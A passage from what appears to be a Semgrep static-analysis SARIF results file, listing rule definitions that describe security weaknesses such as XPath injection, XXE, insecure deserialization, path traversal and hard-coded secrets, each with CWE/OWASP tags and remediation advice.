[https://docs.python.org/3/library/xml.html#xml-vulnerabilities](https://docs.python.org/3/library/xml.html#xml-vulnerabilities)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n - [https://pypi.org/project/defusedxml/](https://pypi.org/project/defusedxml/)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can. The xml parsing library are safe from several known high-impact vulnerabilities such as external entity expansion and DTD retrieval. However, search queries in the XML documents are still vulnerable to XPath injection attacks."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","id":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","name":"python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-xpath-stdlib.tainted-django-xml-xpath-stdlib"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","id":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","name":"python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.redis.python-redis-hardcoded-uri.python-redis-hardcoded-uri"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"help":{"markdown":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor)\n - [https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability](https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/#snakeyaml-deserialization-vulnerability)\n","text":"Used SnakeYAML org.yaml.snakeyaml.Yaml() constructor with no arguments, which is vulnerable to deserialization attacks. Use the one-argument Yaml(...) constructor instead, with SafeConstructor or a custom Constructor as the argument."},"helpUri":"https://semgrep.dev/r/java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","id":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","name":"java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.use-snakeyaml-constructor.use-snakeyaml-constructor"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","id":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","name":"csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.code-injection.compile-taint-grpc.compile-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `addInitScript` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","id":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","name":"javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-addinitscript-code-injection.playwright-addinitscript-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"SonarQube Docs API Key detected"},"help":{"markdown":"SonarQube Docs API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"SonarQube Docs API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","id":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","name":"generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-sonarqube-docs-api-key.detected-sonarqube-docs-api-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","id":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","name":"python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-pickleshare-flask.tainted-pickleshare-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"help":{"markdown":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli)\n - [https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf](https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf)\n","text":"Detected a `$IMPORT` statement that comes from a `$REQ` argument. This could lead to NoSQL injection if the variable is user-controlled and is not properly sanitized. Be sure to properly sanitize the data if you absolutely must pass request data into a mongo query."},"helpUri":"https://semgrep.dev/r/javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","id":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","name":"javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.mongodb.express-mongo-nosqli.express-mongo-nosqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/611.html](https://cwe.mitre.org/data/definitions/611.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. It is our recommendation to secure this parser against XXE attacks by configuring the parser with `factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)`. Alternatively, enabling both of the following configurations also provides protection against XXE attacks. `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD,\"\")` and `factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","id":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","name":"java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.xxe.tainted-schemafactory-xxe-spring.tainted-schemafactory-xxe-spring"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"help":{"markdown":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server)\n - [https://nodejs.org/api/http.html#http_class_http_agent](https://nodejs.org/api/http.html#http_class_http_agent)\n - [https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY](https://groups.google.com/g/rubyonrails-security/c/NCCsca7TEtY)\n","text":"Checks for any usage of http servers instead of https servers. Encourages the usage of https protocol instead of http, which does not have TLS and is therefore unencrypted. Using http can lead to man-in-the-middle attacks in which the attacker is able to read sensitive information."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","id":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","name":"problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.using-http-server.using-http-server"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"help":{"markdown":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD5 hashing algorithm was identified which is considered insecure. MD5 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt. **Note**: MD5 is still considered acceptable when used for Message Authentication Purposes, e.g. with HMAC although better and stronger algorithms should be strongly considered."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","id":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","name":"swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md5.insecure-hashing-algorithm-md5"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","id":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","name":"python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.deserialization.tainted-pyyaml-aws-lambda.tainted-pyyaml-aws-lambda"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"help":{"markdown":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Hardcoded JWT secret or private key is used. This is a Insufficiently Protected Credentials weakness: https://cwe.mitre.org/data/definitions/522.html Consider using an appropriate security mechanism to protect the credentials (e.g. keeping secrets in environment variables)"},"helpUri":"https://semgrep.dev/r/ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","id":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","name":"ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","LOW CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.jwt.security.jwt-hardcode.ruby-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"help":{"markdown":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention)\n - [https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html](https://developer.apple.com/library/archive/documentation/Security/Conceptual/SecureCodingGuide/Articles/ValidatingInput.html)\n - [https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/](https://mas.owasp.org/MASVS/controls/MASVS-CODE-4/)\n - [https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)\n","text":"Usage of Apple's native XML Parser was observed where the parser is explicitly instructed to resolve external entities. This can lead to XXE attacks if untrusted input is parsed. Consider disabling this functionality where feasible."},"helpUri":"https://semgrep.dev/r/swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","id":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","name":"swift.lang.xml.should-resolve-xxe.swift-xxe-prevention","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.xml.should-resolve-xxe.swift-xxe-prevention"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"help":{"markdown":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected wildcard access granted to Glacier Vault. This means anyone within your AWS account ID can perform actions on Glacier resources. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::`."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","id":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","name":"terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-glacier-vault-any-principal.aws-glacier-vault-any-principal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"help":{"markdown":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always)\n - [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06f-testing-local-authentication)\n - [https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/](https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/)\n","text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","id":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","name":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH 